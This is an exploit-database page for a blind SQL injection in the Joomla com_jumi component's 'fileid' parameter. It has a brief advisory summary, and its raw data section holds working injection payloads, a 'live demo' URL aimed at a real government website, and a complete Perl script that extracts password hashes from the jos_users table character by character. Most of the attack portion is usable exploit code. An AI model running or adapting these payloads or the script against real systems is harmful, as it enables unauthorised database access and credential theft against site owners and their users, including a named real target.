header-logo
Suggest Exploit
vendor:
com_jumi
by:
Chip D3 Bi0s
8,8
CVSS
HIGH
Blind SQL injection
89
CWE
Product Name: com_jumi
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability

A vulnerability exists in Joomla Component com_jumi (fileid) which allows an attacker to perform a Blind SQL injection attack. An attacker can send a specially crafted HTTP request containing malicious SQL code to the vulnerable application in order to extract data from the database. The vulnerable parameter is the 'fileid' parameter which can be found in the URL. An example of a malicious URL is http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code>. The malicious SQL code can be used to extract data from the database such as usernames and passwords.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.
Source

Exploit-DB raw data:

------------------------------------------------------------------------------
Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability
------------------------------------------------------------------------------


 #####################################################
 # [+] Author        :  Chip D3 Bi0s                 #
 # [+] Email         :  chipdebios[alt+64]gmail.com  #
 # [+] Vulnerability :  Blind SQL injection          #
 #####################################################



Example:
http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code>

n=number fileid valid

<Sql code>:
'+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
/index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
etc, etc...

DEMO LIVE:
http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101/*

etc, etc....

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

if you want to save the work, you can use the following script

-------------------------------

#!/usr/bin/perl -w

use LWP::UserAgent;


print "\t\t-------------------------------------------------------------\n\n";
print "\t\t                      |  Chip d3 Bi0s |                       \n\n";
print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection        \n\n";
print "\t\t-----------------------------------------------------------------\n\n";




print "http://wwww.host.org/Path: ";
chomp(my $target=<STDIN>);
print " [-] Introduce fileid: ";
chomp($z=<STDIN>);

print " [+] Password: ";

$column_name="concat(password)";
$table_name="jos_users";


$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');


for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter
{            #c referido a ascci 48-57, 97-102
 



  for ($c=48;$c<=57;$c++) 

{
 $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";
 my $res = $b->request(HTTP::Request->new(GET=>$host));
 my $content = $res->content;
 my $regexp = "com_";
# print "limit:";
# print "$x";
# print "; assci:";
# print "$c;";
 if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
 }





for ($c=97;$c<=102;$c++) 
{


 
 $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";
 my $res = $b->request(HTTP::Request->new(GET=>$host));
 my $content = $res->content;
 my $regexp = "com_";
# print "limit:";
# print "$x";
# print "; assci:";
# print "$c;";
 if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
 }
 

}

# milw0rm.com [2009-06-15]

Navigation

Suggest Exploit

Services By CQR